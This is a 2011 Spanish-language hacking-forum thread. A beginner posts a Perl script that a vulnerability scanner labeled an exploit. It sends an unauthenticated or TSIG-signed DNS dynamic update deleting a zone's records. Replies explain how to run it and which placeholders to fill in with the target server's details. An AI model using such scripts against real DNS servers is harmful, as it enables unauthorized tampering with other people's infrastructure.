Indetectables

Indetectables es una Comunidad de Hacking, Seguridad Informática, Impresión 3d y Desarrollo
./index.php

[DUDA] Como utilazar Exlpoit (?)

https://www.indetectables.net/viewtopic.php?t=34778

Página 1 de 1

[DUDA] Como utilazar Exlpoit (?)

Publicado: 11 Oct 2011, 22:09
por ehjnms
Weenas INDETECTABLES, hace unas semanas saliendo un poco de lo basico empeze a meterme en lo que es exploit y sus tantas formas de explotar vulnerabilidades o aprobechar bug's.

Bueno despues de leer un poco, para entender mas use el SSS (Shadow Secutity Scanner) escanee una web y una ves encontrada las vulnerabilidades te da los exploit:

Exploit en perl: quiero saber si el exploit que me da ya esta listo para compilar y usar o se debe modificar o hacer algo mas


#!/usr/bin/perl -w

use Net::DNS;

our $NSI = '<dns server>';
our $NSI_KEY_NAME = '<key name>';
our $NSI_KEY = '<key>';


my $rzone = '<zone>';
my $rptr = "1.$rzone";

my $packet = Net::DNS::Update->new($rzone);

$packet->push(
pre => Net::DNS::RR->new(
Name => $rptr,
Class => 'IN',
Type => 'ANY',
TTL => 0,
)
);
$packet->push(
update => Net::DNS::RR->new(
Name => $rptr,
Class => 'ANY',
Type => 'ANY',
)
);

$packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY;


print $packet->string;

Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);

Perdon si parece una pregunta muy ignorante

Re: [DUDA] Como utilazar Exlpoit (?)

Publicado: 12 Oct 2011, 00:43
por KHC
Que tal, primero que nada creo que esto va a dudas y preguntas xD
Luego dale pues compilalo, por que no lo pruebas? si no funciona pues ya vienes con dudas, la mayoria de los exploits estan listos para compilarlos....
Pero vamos quien compila una porqueria de esas... La idea es usar un interprete compilar es perdida de tiempo! xD
Compilalo y pruebalo y tu mismo nos dices si te funciono o no vale?
Tip: Instala active perl en tu windows, ve al cmd.exe y ve a donde esta el exploit.pl
despues haces la peticion de interpretacion a perl te evitaras estar compilando y de paso aprendes un poco de el sistema, perl y comandos... xD

Re: [DUDA] Como utilazar Exlpoit (?)

Publicado: 12 Oct 2011, 17:39
por linkgl
juhscr escribió:Que tal, primero que nada creo que esto va a dudas y preguntas xD
Luego dale pues compilalo, por que no lo pruebas? si no funciona pues ya vienes con dudas, la mayoria de los exploits estan listos para compilarlos....
Pero vamos quien compila una porqueria de esas... La idea es usar un interprete compilar es perdida de tiempo! xD
Compilalo y pruebalo y tu mismo nos dices si te funciono o no vale?
Tip: Instala active perl en tu windows, ve al cmd.exe y ve a donde esta el exploit.pl
despues haces la peticion de interpretacion a perl te evitaras estar compilando y de paso aprendes un poco de el sistema, perl y comandos... xD
WTF ¿?, no entiendo tu concepto de compilar y tampoco entendí "te evitaras estar compilando", perl es interpretado no se compila xD, se interpreta solamente...

Respecto a tu duda ehjnms

Código: Seleccionar todo

our $NSI = '<dns server>';
our $NSI_KEY_NAME = '<key name>';
our $NSI_KEY = '<key>';
lo que esta entre < y > es lo que tienes que modificar poniendo los datos del server vulnerable, lo dejo en esta sección es una pregunta sobre un código me parece bien aquí.
Todos los horarios son UTC+02:00
Página 1 de 1

© Indetectables Team

Desarrollado por Indetectables LAB